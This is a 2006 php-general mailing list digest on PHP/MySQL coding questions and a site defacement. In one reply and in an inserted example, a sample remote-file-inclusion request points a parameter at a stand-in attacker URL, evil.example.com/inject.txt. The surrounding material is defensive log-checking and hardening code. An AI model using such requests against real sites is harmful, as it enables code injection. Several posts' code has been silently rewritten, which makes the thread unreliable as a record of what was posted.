php-general Digest 13 Nov 2006 17:56:39 -0000 Issue 4457

Topics (messages 244543 through 244560):

one click - two actions?
        244543 by: Mel
        244545 by: John Meyer

Re: Parsing brackets in text
        244544 by: Roman Neuhauser
        244547 by: Dotan Cohen
        244551 by: Roman Neuhauser

Re: Mysql strategy
        244546 by: Dotan Cohen
        244558 by: Dotan Cohen

Re: How do you do the ? mark after a filename
        244548 by: Ivo F.A.C. Fokkema

server side security
        244549 by: H. Dan Phillips

Highjack?
        244550 by: tedd
        244559 by: Eric Butera
        244560 by: bruce

DOM Validation using PHP
        244552 by: Raphael Martins

Re: problem with imagestring()
        244553 by: Piotr Sulecki

MDB2 : never ending story
        244554 by: Alain Roger
        244555 by: Paul Scott
        244556 by: Alain Roger
        244557 by: Paul Scott

Administrivia:

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        php-general@lists.php.net


----------------------------------------------------------------------
--- Begin Message ---
Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image when I click on a link, without repeating the entire query?
The image and the description are both in the same table in my database.

I now show the image when I click on the link, which is good, but the description stays on at all times instead of appearing only when active.

http://www.squareinch.net/single_page.php

This is the code I have for the image area:
/* query 1 from client */
$query = "SELECT * FROM client
          WHERE status='active' OR status='old'
          ORDER BY companyName";
$result = mysql_query($query)
    or die("Couldn't execute query");

while ($aaa = mysql_fetch_array($result, MYSQL_ASSOC))
{
    echo "<span class='navCompany'>" . htmlspecialchars($aaa['companyName']) . "</span><span class='navArrow'> > </span>\n";

    /* query 2 from job */
    $query = "SELECT * FROM job
              WHERE companyId='" . mysql_real_escape_string($aaa['companyId']) . "'";
    $result2 = mysql_query($query)
        or die("Couldn't execute query2");

    /* loop over the job rows; the original foreach ran over the columns of the
       client row and fetched one job per column, which is not what was meant */
    while ($bbb = mysql_fetch_array($result2, MYSQL_ASSOC))
    {
        echo "<span class='navText'><a href='single_page.php?art=" . urlencode($bbb['pix']) . "'>"
           . htmlspecialchars($bbb['jobType']) . "</a></span>\n";
    }
    echo "<br>";
}
?>

</div>

<div class="navbox3"><?php
/* $_GET['art'] is client-controlled: reduce it to a bare file name and
   escape it before it is placed inside the img tag */
$image = isset($_GET['art']) ? basename($_GET['art']) : '';
?>
<img src="images/<?php echo htmlspecialchars($image) ?>" alt="Portfolio Item" border="0" width="285" height="285"></div>


This is the code I have for the description area:

/* query 1 from client */
$query = "SELECT * FROM client
          WHERE status='active' OR status='old'
          ORDER BY companyName";
$result = mysql_query($query)
    or die("Couldn't execute query");

/* the item the visitor clicked in the image area (single_page.php?art=...) */
$selected = isset($_GET['art']) ? $_GET['art'] : '';

while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
    /* query 2 from job */
    $query = "SELECT * FROM job
              WHERE companyId='" . mysql_real_escape_string($row['companyId']) . "'";
    $result2 = mysql_query($query)
        or die("Couldn't execute query2");

    /* the original looped over the columns of the client row and tested a
       non-empty string literal, which is always true, so every description
       was printed; show only the job whose image is currently selected */
    while ($job = mysql_fetch_array($result2, MYSQL_ASSOC))
    {
        if ($job['pix'] === $selected && !empty($job['url']))
        {
            echo "<span class='navText'><a href='" . htmlspecialchars($job['url']) . "'>"
               . htmlspecialchars($job['web']) . "</a></span>";
        }
    }
    echo "<br>";
}
?>



--- End Message ---
--- Begin Message ---
Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?


--- End Message ---
--- Begin Message ---
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
> >
> ><?php
> >function makeLink($matches) {
> >        $returnString="<b>" . $matches[1] . "</b>";
> >        return $returnString;
> >}
> >
> >$articleText="This is a very [long] string.";
> >$articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink",
> >$articleText);
> >print $articleText . "\n";
> >?>
> >
> >
> >The callback takes whatever the regular expressions returns (alpha
> >characters between [ and ]) and runs it through function "makeLink".
> >
> >Not sure how that will go with multiple []'s etc in the same string but
> >it should get you started.
> >
> 
> I didn't know that I had to call the function like that- I don't
> remember ever seeing it called that way.

    It's done this way in all the examples on
    http://cz.php.net/manual/en/function.preg-replace-callback.php
    What documentation did you read?

> Also, I must google the meaning of the (~+) in the regex.

    No need to google:

    http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php

    Skip the Differences From Perl section.

-- 
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man.  You don't KNOW.
Cause you weren't THERE.             http://bash.org/?255991

--- End Message ---
--- Begin Message ---
On 13/11/06, Roman Neuhauser <[EMAIL PROTECTED]> wrote:
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
> >
> ><?php
> >function makeLink($matches) {
> >        $returnString="<b>" . $matches[1] . "</b>";
> >        return $returnString;
> >}
> >
> >$articleText="This is a very [long] string.";
> >$articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink",
> >$articleText);
> >print $articleText . "\n";
> >?>
> >
> >
> >The callback takes whatever the regular expressions returns (alpha
> >characters between [ and ]) and runs it through function "makeLink".
> >
> >Not sure how that will go with multiple []'s etc in the same string but
> >it should get you started.
> >
>
> I didn't know that I had to call the function like that- I don't
> remember ever seeing it called that way.

    It's done this way in all the examples on
    http://cz.php.net/manual/en/function.preg-replace-callback.php
    What documentation did you read?

In the first example on that page, it looks to me like it should just
return the text "next_year", and not call that function. Obviously, it
is my misunderstanding of the way that the function works, and not in
the function itself. I do learn php from TFM and this list, not from a
course. Just like in any learning environment, I could misinterpret
what is taught to me and need to ask a question, or not even know that
I misinterpreted and not know that I need to ask a question. This is a
case of the latter, clearly, because I have never needed to do
anything other than a simple str_replace until now.

> Also, I must google the meaning of the (~+) in the regex.

    No need to google:

    http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php

    Skip the Differences From Perl section.

That I have read at least three or four times. I still don't capture
all of it, but I try. You are correct, I should have referenced that
right away. It won't hurt for me to read it again, too. Thank you.

Dotan Cohen

--- End Message ---
--- Begin Message ---
# [EMAIL PROTECTED] / 2006-11-13 15:02:53 +0200:
> >    http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
> >
> >    Skip the Differences From Perl section.
> 
> That I have read at least three or four times. I still don't capture
> all of it, but I try. You are correct, I should have referenced that
> right away. It won't hurt for me to read it again, too. Thank you.

    Just keep reading it, but not without trying out various things
    yourself. I had a hard time hammering it into my head a few years ago,
    but it has been paying off like crazy. Your gain might vary.

-- 
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man.  You don't KNOW.
Cause you weren't THERE.             http://bash.org/?255991

--- End Message ---
--- Begin Message ---
On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
Dotan Cohen wrote:
> If I have to perform 30 LIKE searches for different keywords in a
> varchar field, which strategy would be recommended:
> 1) 30 searches, one for each keyword

No. Horribly inefficient.

> 2) To select the varchar field from all the rows, and search through
> them with php's array functions?

No. Make the database do the work.

Use full text indexing:
http://dev.mysql.com/doc/refman/4.1/en/fulltext-search.html


Thanks, Chris, but that approach won't work as I don't know all the
values that I'll be searching for at any one time. In fact, I only
know one of them at a time. This is the makeLink function in another
thread that you helped me in.

However, I do see other use of the full-text search functions in my
future! This looks like it could save me quite a bit of work on
another project.

Dotan Cohen

--- End Message ---
--- Begin Message ---
On 13/11/06, David Tulloh <[EMAIL PROTECTED]> wrote:
Dotan Cohen wrote:
> If I have to perform 30 LIKE searches for different keywords in a
> varchar field, which strategy would be recommended:
> 1) 30 searches, one for each keyword
> 2) To select the varchar field from all the rows, and search through
> them with php's array functions?

It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each.  I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.

If you are worried about the speed of this query I'd suggest rethinking
your database structure.  Text field comparisons will always be
relatively slow compared to numeric comparisons or numeric lookups.  My
reading of this query however is that it should be 30 OR comparisons, no
joins involved.  In this case the query will scale linearly with your
database size so you shouldn't worry too much about it slowing down over
time.

By that do you mean that it is O(n)? Yes, it is linear.

It's a matter of knowing if 30 LIKE queries are more efficient than
one big query that brings down three fields (an INT and two VARCHAR's)
for every row in the table. Now that I'm thinking about it, I'm
probably better off with one big query, as it is only one query, and
I'd imagine that flipping through an array 30 times is faster than
making 30 database calls.

Dotan Cohen

http://what-is-what.com/what_is/digg.html

--- End Message ---
--- Begin Message ---
On Sun, 12 Nov 2006 22:02:51 -0700, Thomas Bonham wrote:

> Thank you for that, it was a big help.
> 
> Can I also call function that way?
> 
> Again thank you for your help.
> 
> Thomas

Do you mean:

/index.php?action=search

<?php
if (isset($_GET['action']) && $_GET['action'] == 'search') {
    search_items();
} else {
    view_all_items();
}
?>

--- End Message ---
--- Begin Message ---
Let me begin by saying I'm a newbie to PHP and open source. I set up a Windows 2003 server with IIS6, PHP 5.x and MySQL 5.x for one of our developers to start building a new web-based application. The developer will be using phpMyAdmin for his purposes. The settings that were used were ones posted on many web sites for this combo. I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and MySQL. The developer will be securing access to the application from his end, but I want to make sure that the server also remains secure. It will only be used within our intranet and only by a handful of people. Any and all suggestions will be greatly appreciated.

Thanks,
Dan Phillips

--- End Message ---
--- Begin Message ---
Hi gang:

While this is not an obvious php question, it does deal with security which is a concern.

Just this morning I had a couple of my sites "highjacked". What I found was that someone had replaced my root level index.php with their own index.php. You can see the result at:

http://xn--u2g.com/index1.php

It was not a terrible loss nor inconvenience, but I wonder how they did it. Any ideas how this was done and suggestions as to how to prevent this from happening again?

Thanks,

tedd

--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--- End Message ---
--- Begin Message ---
Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--- End Message ---
--- Begin Message ---
eric...

you say how embarrassing regarding the $path.'foo'.... I'm curious, why/how is
this simple piece of code exploitable? Assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



--- End Message ---
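As an added example for the two messages above (not code from Eric, bruce or anyone on this thread), the include pattern Eric describes next to a hardened form, and a check over access-log lines for the URL-in-query-string requests he suggests looking for. The function names, the allow-list entries and the log lines are constructed for the example.

```php
<?php
// Added example, not from the thread. With register_globals on, a request
// ?path=... defines $path before the include line runs, so the client picks
// the file (and with allow_url_include, a remote URL). Log lines are constructed.

// What Eric's include($path . 'script.php') resolves to once $path comes from the request.
function vulnerableIncludeTarget(array $requestVars)
{
    $path = isset($requestVars['path']) ? $requestVars['path'] : './';   // register_globals effect
    return $path . 'script.php';
}

// Hardened form: the request picks a key from a fixed allow-list, never a path,
// and the file is resolved under a directory the code controls.
function safeIncludeTarget($action, $baseDir)
{
    static $allowed = array('home' => 'home.php', 'search' => 'search.php');
    if (!is_string($action) || !isset($allowed[$action])) {
        $action = 'home';                        // unknown key: fall back, never echo it back
    }
    return rtrim($baseDir, '/') . '/' . $allowed[$action];
}

// Detection: flag access-log requests where any query parameter carries a URL,
// the pattern Eric suggests looking for in the server logs.
function findRemoteIncludeAttempts(array $logLines)
{
    $hits = array();
    foreach ($logLines as $line) {
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP/', $line, $m)) {   // request target of the log line
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (empty($query)) {
            continue;
        }
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(?:https?|ftp)://#i', $value)) {
                $hits[] = array('param' => $name, 'value' => $value, 'line' => $line);
            }
        }
    }
    return $hits;
}

// Constructed sample log lines in Apache combined format; addresses are documentation ranges.
$sampleLog = array(
    '198.51.100.7 - - [13/Nov/2006:09:12:01 -0500] "GET /index.php?action=search HTTP/1.1" 200 512 "-" "Mozilla"',
    '203.0.113.9 - - [13/Nov/2006:09:12:05 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 88 "-" "libwww-perl"',
    '198.51.100.7 - - [13/Nov/2006:09:12:09 -0500] "GET /single_page.php?art=photo1.jpg HTTP/1.1" 200 4096 "-" "Mozilla"',
);

echo "vulnerable include would load: ", vulnerableIncludeTarget(array('path' => 'http://evil.example.com/')), "\n";
echo "hardened include loads:        ", safeIncludeTarget('http://evil.example.com/', '/var/www/pages'), "\n";
foreach (findRemoteIncludeAttempts($sampleLog) as $hit) {
    echo "suspicious request: parameter '{$hit['param']}' carries a URL: {$hit['value']}\n";
}
```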
--- Begin Message ---
Hi there!

I'm building a form validator using PHP and JS. It's working fine by now, but I want to make a little improvement. Here is how it's working now:

  1. The user fills in the form. Every time he leaves a field, the JS
     code matches the value against a regexp to validate it.
  2. When the user submits the form, the PHP script matches all the
     values against the same regexps.

Now I want to validate my fields to prevent XSS, allowing my HTML tags but only the attributes that I want.
I thought of something like this (the tags and the valid attributes):
<?php
$form_html_validation = array(
       "p"=>array(""),
       "a"=>array("href","name","rel"),
       "ol"=>array(""),
       "ul"=>array(""),
       "li"=>array(""),
       "h2"=>array(""),
       "h3"=>array(""),
       "h4"=>array(""),
       "h5"=>array(""),
       "h6"=>array(""),
       "strong"=>array(""),
       "em"=>array("")
);
$valid_elements = "<".join("><",array_keys($form_html_validation)).">";
$userInput = strip_tags($userInput,$valid_elements);
//perform DOM Attribute Validation
?>
But I don't know how to loop over every attribute for each tag in the DOM tree.

Does anyone have any ideas?

Thank You

--- End Message ---
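As an added example (not Raphael's code, and not part of any post in this thread), the attribute loop his snippet leaves as a comment, written with DOMDocument over his $form_html_validation map; the function names and the sample input are constructed, and since href is an allowed attribute its URL scheme is checked too, because strip_tags alone keeps every attribute of an allowed tag.

```php
<?php
// Added example, not from Raphael's post: attribute allow-listing over the DOM tree
// using his $form_html_validation map. Unlisted tags are unwrapped (text kept, tag
// dropped), script/style are removed whole, unlisted attributes are stripped, and
// href is limited to relative, http(s) or mailto URLs. The sample input is constructed.
function sanitizeHtml($userInput, array $allowed)
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);        // sloppy user markup must not emit warnings
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $userInput . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $root = $doc->getElementsByTagName('div')->item(0);
    cleanNode($root, $allowed);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function cleanNode(DOMNode $node, array $allowed)
{
    $children = array();                             // snapshot: the tree is mutated while walking
    foreach ($node->childNodes as $child) {
        $children[] = $child;
    }
    foreach ($children as $child) {
        if ($child->nodeType !== XML_ELEMENT_NODE) {
            if ($child->nodeType !== XML_TEXT_NODE) {
                $node->removeChild($child);          // comments and PIs go, text stays
            }
            continue;
        }
        $tag = strtolower($child->nodeName);
        if ($tag === 'script' || $tag === 'style') {
            $node->removeChild($child);              // their content is code, not prose
            continue;
        }
        cleanNode($child, $allowed);                 // depth first: hoisted children are already clean
        if (!isset($allowed[$tag])) {
            while ($child->firstChild) {             // unwrap: hoist children, then drop the element
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
            continue;
        }
        $keep = array_filter($allowed[$tag], 'strlen');   // Raphael's array("") means "no attributes"
        for ($i = $child->attributes->length - 1; $i >= 0; $i--) {
            $attr = $child->attributes->item($i);
            $name = strtolower($attr->name);
            if (!in_array($name, $keep, true) || ($name === 'href' && !safeUrl($attr->value))) {
                $child->removeAttribute($attr->name);
            }
        }
    }
}

function safeUrl($url)
{
    $url = trim($url);
    if (!preg_match('#^[a-z][a-z0-9+.\-]*:#i', $url)) {
        return true;                                 // no scheme: a relative URL
    }
    return (bool) preg_match('#^(?:https?|mailto):#i', $url);
}

$form_html_validation = array(
    "p" => array(""), "a" => array("href", "name", "rel"), "ol" => array(""), "ul" => array(""),
    "li" => array(""), "h2" => array(""), "h3" => array(""), "strong" => array(""), "em" => array(""),
);
// Constructed input: a forbidden attribute, a forbidden href scheme, a script element, an unlisted tag.
$sample = '<p onclick="x()">Hi <a href="javascript:void(0)" rel="nofollow">link</a><script>bad()</script> <b style="a">bold</b></p>';
echo sanitizeHtml($sample, $form_html_validation), "\n";
```

The `DOMDocument::saveHTML($node)` form used to serialise the cleaned children requires PHP 5.3.6 or later.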
--- Begin Message ---
Ave!

Forget it. It turned out that the culprit was Debian-specific patch of
libgd2.

Sorry for bothering you.

Regards,

Piotr Sulecki.

--- End Message ---
--- Begin Message ---
Dear all,

I still get the same error when I run this code:
==> Call to a member function fetchRow() on a non-object on line "while
((.... "
so it seems that the package MDB2_Driver_pgsql is not loaded or something is
wrong...
I'm really lost... 4 days that I've been working on it without any solution...


$db2 =& MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
    die("Error connection : " . $db2->getMessage() . "<br><br>" . $db2->getUserinfo());
}

/* exec() is for statements without a result set and returns the number of
   affected rows (an integer), so $res->fetchRow() fails on a non-object;
   query() returns an MDB2_Result object that rows can be fetched from */
$res =& $db2->query($query);
if (PEAR::isError($res))
{
    die("Error query : " . $res->getMessage() . "<br><br>" . $res->getUserinfo());
}

while (($row = $res->fetchRow()))
{
    echo $row[0] . "<br>";
}

--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5

--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote:
> Dear all,
> 
> i still got the same error when i run this code :
> ==> Call to a member function fetchRow() on a non-object on line "while

Then why not try something else?

Try this:

$db2 =& MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
    die("Error connection : " . $db2->getMessage() . "<br><br>" . $db2->getUserinfo());
}
$db2->setLimit($first, $count); // set the first row that you want and
                                // the number of rows after that that you want...
$res = $db2->exec($stmt);
if (PEAR::isError($res)) {
    $ret = false;
} else {
    .............;

--Paul

All Email originating from UWC is covered by disclaimer 
http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm 

--- End Message ---
--- Begin Message ---
And therefore how do you want to get the result set?
Nothing is solved now... I still need a fetchRow or fetchOne....

--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5

--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 18:07 +0100, Alain Roger wrote:
> And therefore how do you want to get the result set ?
> nothing is solved now... i still need a fetchrow or fetchOne....

Have you read _any_ of the MDB2 docs??

<rant warning>

As far as I can see you have decided not to even _try_ any of the
solutions that people on this list, and others, have given you...

My final advice to you is RTFM and google it.

</rant warning>

--Paul

--- End Message ---
